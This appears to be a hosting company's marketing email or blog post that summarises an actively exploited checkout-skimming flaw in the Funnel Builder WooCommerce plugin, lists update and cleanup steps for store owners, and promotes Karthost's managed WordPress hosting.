Hey there,
If you run an online store on WooCommerce, you know how critical the checkout process is. It’s where trust meets transactions—your customers hand over their credit card details expecting a safe, seamless experience. But what if a popular plugin you rely on for funnels and checkouts has a hidden vulnerability letting attackers steal that data right in front of you?
That’s exactly what’s happening right now with the Funnel Builder plugin (by FunnelKit). Used by over 40,000 WooCommerce stores, a critical flaw in versions before 3.15.0.3 is under active exploitation. Unauthenticated attackers can inject malicious JavaScript into your checkout pages, often disguised as legitimate analytics or Google Tag Manager code. This skimmer quietly captures credit card numbers, CVVs, billing addresses, and more as customers complete their purchases.
The vulnerability stems from an unprotected checkout endpoint that allowed anyone to modify global plugin settings. The injected script connects to a remote server and deploys tailored payment skimmers—classic Magecart-style tactics that blend in with normal tracking tags. Even if your site looks fine, customer data could be leaking without you knowing it.
What should you do immediately?
- Update Funnel Builder to version 3.15.0.3 or newer right away.
- Check your plugin settings (Settings > Checkout > External Scripts) for any unfamiliar code and remove it.
- Review your recent orders and consider alerting affected customers if needed.
- Scan your site for other potential issues.
This incident is a stark reminder: plugins extend your store’s power, but they also expand your attack surface. Small business owners and eCommerce entrepreneurs often juggle marketing, content, and operations—they shouldn’t also have to play full-time security expert.
At Karthost, we take the heavy lifting off your plate. Our managed WordPress hosting, powered by scalable Convesio containers on Google Cloud, delivers automatic performance scaling, built-in security protections, and reliable uptime—perfect for busy WooCommerce stores handling real traffic. Our VIP WordPress Care Plan includes regular updates to core, plugins, and popular themes, along with monthly site status reports and malware scanning. We handle the backend so you can focus on growing your business.
Whether you need rock-solid hosting that grows with your store, professional email solutions to match your brand, or expert support that truly understands small business needs, Karthost is here to keep your site fast, secure, and running smoothly.
Ready to stop worrying about updates, vulnerabilities, and performance? Visit karthost.com or check out our Managed WordPress Hosting and VIP Care Plans today.
Source: Funnel Builder Flaw Under Active Exploitation Enables WooCommerce Checkout Skimming
